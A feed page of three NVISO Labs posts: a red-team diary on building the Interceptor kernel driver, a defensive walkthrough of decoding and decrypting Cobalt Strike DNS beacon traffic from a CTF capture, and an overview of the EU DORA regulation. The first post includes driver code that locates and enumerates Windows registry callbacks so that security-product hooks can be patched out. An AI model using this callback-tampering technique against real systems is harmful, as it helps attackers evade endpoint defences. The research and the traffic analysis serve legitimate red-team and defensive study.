🔒
There are new articles available, click to refresh the page.
✇ NVISO Labs

Kernel Karnage – Part 5 (I/O & Callbacks)

By: bautersj

After showing interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2, however the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting over the functionality from Evil driver to Interceptor and added support for patching image load callbacks as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
    |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
    |   +-- Globals.h               | contains global variables used in all modules
    |   +-- pch.h                   | precompiled header
    |   +-- Interceptor.h           | function prototypes
    |   +-- Intercept.h             | function prototypes
    |   +-- Callbacks.h             | function prototypes
    +-- Source Files
    |   +-- pch.cpp
    |   +-- Interceptor.cpp         | driver code
    |   +-- Intercept.cpp           | IRP hooking module
    |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
    |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O via 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On a IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
}

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer;
data.index = 1;
data.driverName = "\\Driver\\MyDriver";
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut), this will allocate the specified number of bytes (szBufferOut) as fixed memory memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the PsLoadImageNotifyRoutineEx() callback, which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly different when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of going the same route as with obtaining the address for the callback arrays by enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to instead enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 jumps (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). Instead, by using CmUnRegisterCallback(), we only need to look for a LEA, RCX (0x48 0x8d 0x0d) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	ULONG64 OffsetAddr = 0;
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
			return OffsetAddr + 7 + instructionAddr;
		}
	}
	return 0;
}

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>   
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Decrypting DNS Traffic – Part 5

By: Didier Stevens

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we deal with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate how Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with tool 1768.py:

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

And then a third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them when they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org are the root labels of every query that this beacon will issue, and this is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number, that is used to identify the beacon with the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS request for this particular beacon, will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  3. DNS_AAAA
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings, are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with http://www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries is what a beacon uses to inquire if the team server has tasks for the beacon in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is 8.8.4.4 (the default DNS_Idle value is 0.0.0.0).

Looking at figure 4, we see that the replies to the first requests are 8.8.4.4. These have to be XORed with DNS_Idle value 8.8.4.4: thus the result is 0.0.0.0. A reply equal to 0.0.0.0 means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has to do nothing.

That changes with the 6th query: the reply is IPv4 address 8.8.4.246, and when we XOR that value with 8.8.4.4, we end up with 0.0.0.242. Value 0.0.0.242 instructs the beacon to check for tasks using TXT record queries.

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.

The next set of DNS queries are performed by the beacon because of the instructions (0.0.0.242) it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (0.0.0.242).

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT query is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, 8.8.4.68 XORed with 8.8.4.4 gives 0.0.0.64. This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query will be an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The value of each TXT record is a BASE64 string, that has to be concatenated together before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is introduced to avoid that cached DNS results can interfere in the communication. This is done by making each name in the DNS queries unique. This is done with an extra hexadecimal label.

Notice that there is an hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. That hexadecimal label consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter always starts with 0 and increments with 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive in disorder.

Thus, when all the DNS TXT replies have been received (there is only one in our example), the base 64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records (0.0.0.240 reply), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is 8.8.4.116, XORed with 8.8.4.4, this gives 0.0.0.112. Thus 112 bytes of encrypted data have to be received.: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, is uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each name of a DNS query for a DNS_output query, has a unique hexadecimal counter, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted, is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]thedarkestside.org.

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.]thedarkestside.org: domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes long.

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.

The hexadecimal data above, is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output) and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (size of the encrypted data). That size field is not present in the format of the DNS_output data.

Decryption

We have developed a tool, cs-parse-traffic, that can decrypt and parse DNS traffic and HTTP(S). Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

Option -f dns is required to process DNS traffic, and option -i 8.8.4.4. is used to provided the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

That key can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic

Conclusion

The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic, is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

The digital operational resilience act (DORA): what you need to know about it, the requirements and challenges we see.

By: nicoameye

TL;DR – In this blogpost, we will give you an introduction to DORA, as well as how you can prepare yourself to be ready for it.

More specifically, throughout this blogpost we will try to formulate an answer to following questions:

  • What is DORA and what are the key requirements of DORA?
  • What are the biggest challenges that you might face in becoming “DORA compliant”?

This blog post is part of a series, keep an eye out for the following parts! In the following blogposts, we will further explore the requirements of DORA, as well as elaborate a self-assessment checklist for financial entities to start assessing their compliance.

What is DORA?

DORA stands for Digital Operational Resilience Act. DORA is the EU proposal to tackle digital risks and build operational resilience in the financial sector. 

The idea of DORA is that organizations are able to demonstrate that they can resist, respond and recover from the impacts of ICT incidents, while continuing to deliver critical functions and minimizing disruption for customers and for the financial system as a whole.

With the DORA, the EU aims to make sure financial organisations mitigate the risks arising from increasing reliance on ICT systems and third parties for critical operations. The risks will be mitigates through appropriate Risk Management, Incident Management, Digital Operational Resilience Testing, as well as Third-Party Risk Management.

Who is concerned?

DORA applies to financial entities, from banks i.e. credit institutions to investment & payment institutions,  electronic money institutions, pension, audit firms, credit rating agencies, insurance and reinsurance undertakings and intermediaries.

Beyond that it also applies to providers of digital and data services, including providers of cloud computing services, data analytics, & data centres.

Note that, while the scope of the DORA itself is proposed to encompass nearly the entire financial system, at the same time it allows for a proportionate application of requirements for financial entities that are micro enterprises.

Exploring DORA

What is operational resilience? Digital operational resilience is the ability to build, assure and review the technological operational integrity of an organisation. In a nutshell, operational resilience a way of thinking and working that emphasizes the hardening of systems so that when an organization is attacked, it has the means to respond, recover, learn, and adapt.

Organizations that do not adopt this mindset are likely to experience DORA as an almost impossibly long checklist of disconnected requirements. We will cover the requirements in the coming blogposts.

DORA introduces requirements across five pillars: 

  • ICT Risk Management
  • ICT-related Incidents Management, Classification and Reporting
  • Digital Operational Resilience Testing
  • ICT Third-Party Risk Management
  • Information and Intelligence Sharing

We have summarised the requirements and these key challenges to start addressing now for each of the 5 pillars. 

ICT Risk Management

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

What is required?

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus the DORA does not impose specific standardization itself.

What do we consider as potential challenges for most organizations?

As described in DORA, the structure does not significantly deviate from standard Information security risk management as defined in NIST Cyber Security Framework.

However, we foresee some elements that might rise additional complexity:

First, as we reviewed, the ICT risk management requirements are organised around:

  • Identifying business functions and the information assets supporting these.
  • Protecting and preventing these assets.
  • Detecting anomalous activities.
  • Developing response and recovery strategies and plans, including communication to customers and stakeholders.

We foresee several elements that might rise additional complexity:

1. Nowadays, we see many organizations struggling with adequate asset management. A first complexity might emerge from the fact the ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. This framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

2. Protection and Prevention is also a challenge for most organizations. Based on the risk assessment, financial entities shall set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT  security  strategies, policies,  procedures and appropriate technologies to ensure the continuous monitoring and control of ICT systems and tools.

3. Most organizations also struggle with timely or prompt detection of anomalous activities. Some complexity might arise as financial entities shall have to ensure the prompt detection of anomalous activities, enforce multiple layers of control, as well as enable the identification of single points of failure.

4. However, while the first three of these will be fairly familiar to most firms, although implemented with various degrees of maturity, the latter (response and recovery) should focus minds. This will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

5. On top of this, as part as the “Learning and Evolving” part of DORA’s Risk Management Framework, DORA not only introduces compulsory training on digital operational resilience for the management body but also for the whole staff, as part of their general training package. Getting all staff on-board might create additional complexity.

In a coming blogpost, we will be reviewing the requirements associated with the risk-based approach based on the ICT risk management framework of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT-related Incidents Management, Classification and Reporting

DORA has its core in a strong evaluation and reporting process. This process is reflected in Chapter 3 of the regulation.

What is required?

What is required?

In the regulation, ICT-related incident reporting obliges financial entities to establish and implement a management process to monitor and log ICT-related incidents and to classify them based on specific criteria.

The ICT-related Incident Management requirements are organised around:

  • Implementation of an ICT-related incident management process
  • Classification of ICT-related incidents
  • Reporting of major ICT-related incidents

What do we consider as potential challenges for most organizations?

We foresee two elements that might rise additional complexity:

1. First, financial entities will need to review their incident classification methodology to fit with the requirements of the regulation. To help organisations prepare, we anticipate that the incident classification methodology will align with the ENISA Reference Incident Classification Taxonomy.  Indeed, this framework is referenced in the footnote of DORA. Other standards might be permissible, provided they meet the conditions set out in the Regulation but, when a standard or framework is especially called out, there is no downside to considering it.

2. Second, financial entities will also need to set up the right processes and channels to be able to notify the regulator fast in case a major incident occurs. Although firms will only need to report major incidents to their national regulator, this will need to be within strict deadlines. Moreover, based on what gets classified as “major”, this might happen frequently. 

In a coming blogpost, we will be reviewing the requirements associated with the ICT-related Incidents Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Digital Operational Resilience Testing

DORA introduces the testing efficiency of the risk management framework and measures in place to respond to and recover from a wide range of ICT incident scenarios. This process is reflected in Chapter 4 of the regulation.

What is required?

The underlying rationale behind this part of the regulation would be that undetected vulnerabilities in financial entities could threaten the stability of the financial sector. In order to mitigate this risk, DORA introduces a comprehensive testing program with the aim to identify and explore possible ways in which financial entities could be compromised.

Digital operational resilience testing serves for the periodic testing of the ICT risk management framework for preparedness and identification of weaknesses, deficiencies or gaps, as well as the prompt adoption of corrective measures.

DORA also strongly recommends advanced testing of ICT tools, systems and processes based on threat led penetration testing (“TLPT”), carried out at least every 3 years. The technical standards to apply, when conducting intelligence-based penetration testing, are likely to be aligned with the TIBER-EU developed by the ECB.

The Digital Operational Resilience Testing requirements are therefore organised around:

  • Basic Testing of ICT tools and systems – Applicable to all financial entities
  • Advanced Testing of ICT tools, systems and processes (“TLPT”) – Only applicable to  financial entities identified as significant by competent authorities

What do we consider as potential challenges for most organizations?

We foresee two elements that might rise additional complexity:

1. First, from a cultural standpoint, a challenge might be that financial entities see or perceive Operational Resilience testing as BCP or DR testing. A caution has to be raised here as the objective of DORA with this requirements focuses more on penetration testing than the traditional Operational Resilience testing.

From another cultural standpoint, resilience testing programs should not be perceived as a single goal. It should not be perceive as a binary value concept (either it is in place or not). As stated, the underlying behind DORA is rather about identifying weaknesses, deficiencies or gaps, and admitting that a breach might happen or a vulnerability could go undetected. DORA is therefore more about preparing to withstand just such a possibility.

2. Second, as stated, significant financial entities (might be firms already in the scope of NIS regulation) will have to implement a threat-led penetration testing program and exercise. It is likely that this first exercise will have to be organized by the end of 2024. This might seem like a sufficient period to time for these tests to be conducted, however, consider that these types of tests will require a lot of preparation. First, all EU-based critical ICT third parties are required to be involved. This means that all of these third-parties should also be involved in the preparation of this exercise, which will require a lot of coordination and planning beforehand. Second, the scenario for these threat-led penetration testing exercises will have to be agreed by the regulator in advance. Significant financial entities should therefore start thinking about the scenario as soon as possible to enable validation with the regulator at least 2 years before the deadline.  

In a coming blogpost, we will be reviewing the requirements associated with the Resilience Testing of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT Third-Party Risk Management

DORA introduces the governance of third-party service providers and the management of third-party risks. DORA states that financial entities should have appropriate level of controls and monitoring of their ICT third parties. This process is reflected in Chapter 5 of the regulation.

What is required?

Chapter 5 addresses the key principles for a sound management of ICT Third-Party risks. In a nutshell, the main requirements associated with these key principles could be described as the following:

  • Obligatory Contractual Provisions :
    • DORA introduces obligatory provisions that have to be present in any contract concluded between a financial institution and an ICT third-party provider.
  • ICT third-party risk strategy definition :
    • Firm shall define a multi-vendor ICT third-party risk strategy and policy owned by a member of the management body.
  • Maintenance of a Register of Information :
    • Firms shall define and maintain a register of information that contains the full view of all their ICT third-party providers, the services they provide and the functions they underpin according to the key contractual provisions.
  • Perform due diligence/assessments :
    • Firms shall assess ICT service providers according to certain criteria before entering into a contractual arrangement on the use of ICT services (e.g. security level, concentration risk, sub-outsourcing risks).

What do we consider as potential challenges for most organizations?

We foresee several elements that might rise additional complexity:

1. One of the main challenges that we foresee relates to the assembling and maintenance of the Register of Information. Financial entities will have to collect information on all ICT vendors (not only the most critical).  

This might create additional complexity as DORA states that this register shall be maintained at entity level and, at sub-consolidated and consolidated levels. DORA also states that this register shall include all contractual arrangements on the use of ICT services provided, identifying the services the third-party provided and the functions they underpin. 

This requirement could be considered as a challenge, on one hand, for large financial entities that rely on thousands of big and small providers, as well as on the other hand, for smaller, less mature financial institutions that will have to ensure that that register of information is complete and accurate.

Some other challenges also have to be foreseen.

2. Contracts with all ICT providers will probably need to be amended. For “EBA” critical contracts this will be covered through the EBA directive on this, however for others (if all ICT providers are affected) this will not be the case yet. Identifying those, and upgrading their contracts will be a challenge.

3. Regarding the Exit strategy, and following the same reasoning, for “EBA” critical contracts this will be covered through the EBA directive on this, however for others this might not be the case yet. Determining how to enforce this requirement in these contract will also have to be seen as creating additional complexity.

4. Determining a correct risk-based approach for performing assessments on the ICT providers will possibly add additional complexity as well. Performing assessments on all ICT providers is not feasible. ICT providers will have to be prioritized based on criticality criteria that will have to be defined.

In a coming blogpost, we will be reviewing the requirements associated with the ICT Third-Party Risk Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Information and Intelligence Sharing

DORA promotes information-sharing arrangements on cyber threat information and intelligence. This process is reflected in Chapter 6 of the regulation.

What is required?

DORA introduces guidelines on setting up information sharing arrangements between firms to exchange among themselves cyber threat information and intelligence on tactics, techniques, procedures, alerts and configuration tools in a trusted environment.

